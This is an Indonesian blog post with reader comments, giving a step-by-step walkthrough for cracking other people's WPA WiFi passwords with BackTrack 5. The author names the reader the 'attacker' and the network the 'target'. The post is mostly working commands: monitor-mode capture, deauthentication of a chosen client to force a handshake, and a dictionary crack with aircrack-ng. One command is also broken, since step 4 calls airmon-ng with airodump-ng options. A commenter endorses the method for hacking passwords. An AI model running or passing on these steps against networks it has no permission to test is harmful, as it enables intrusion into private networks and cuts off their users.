Senin, 15 Juli 2013

Cara Mendapatkan Password WiFi dengan Backtrack 5

Kali ini saya akan berbagi sedikit tentang bagaimana Cara Mendapatkan Password Wifi Menggunakan BackTrack 5

Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.


Persiapan :
1. Aircrack
2. Dictionary attack



Langkah - Langkah :
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover


1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill

2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0

3. Monitoring setiap akses poin yang ada di sekitar attacker

#airodump-ng mon0


4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0



Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin




5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0

Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien

Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.

#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0



6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt

Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.


7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini



 Oke, Sekian Sedikit Penjelasan dari saya, Semoga bermanfaat dan ingat, jangan salah gunakan untuk hal yang tidak penting, hehehe..

14 komentar:

  1. Yes I agree backtrack tool is very effective for hacking passwords. Highly recommended for this purpose.

    Thanks
    Silvester Norman

    Change Mac Address


    BalasHapus
    Balasan
    1. Ok

      Thanks for visit and comment my blog.

      ~Keep Calm and Go Open Source~

      Hapus
  2. jika password tidak terdapat di dalam direktori dictionary??? solusinya??

    BalasHapus
  3. broo..kembangkan terus blognya..z suka posting blogmu..moga kamu punya blog banyak pengunjungnya ..amiin..

    BalasHapus
  4. jika password tidak ada di kamus maka password WPA tidak akan ditemukan . jadi kesimpulannya adalah password WPA tidak bisa dijebol

    BalasHapus
  5. teknik ini apa bisa jalan kale make virtual om??
    mampir yah..:D
    http://semua-tinggal-download.blogspot.com/

    BalasHapus
  6. boleh lah...
    mampir ya ke blog ane :D
    sumberinformasii.blogspot.com

    BalasHapus
  7. wiss keren cobha dulu ahh

    BalasHapus
  8. bang jangan lupa kunjung balik yahh
    fauzan652.blogspot.com

    BalasHapus
  9. mind kalo dia bilang no such device itu apa yh?

    BalasHapus
  10. Gimana kok di aircrack ga mau directory kosong padahal wpa handshakenya sdah dapat dan capnya sudah ada tapi ga bisa di aircrack gi mana ni..
    #aircrack-ng output-01.cap -w /root/crack wpa.txt
    Langkah ini gagal gimana ya?

    BalasHapus
  11. nice post gan.
    kalau pake teknik ini di VirtualBox apakah work gan??

    thanks

    BalasHapus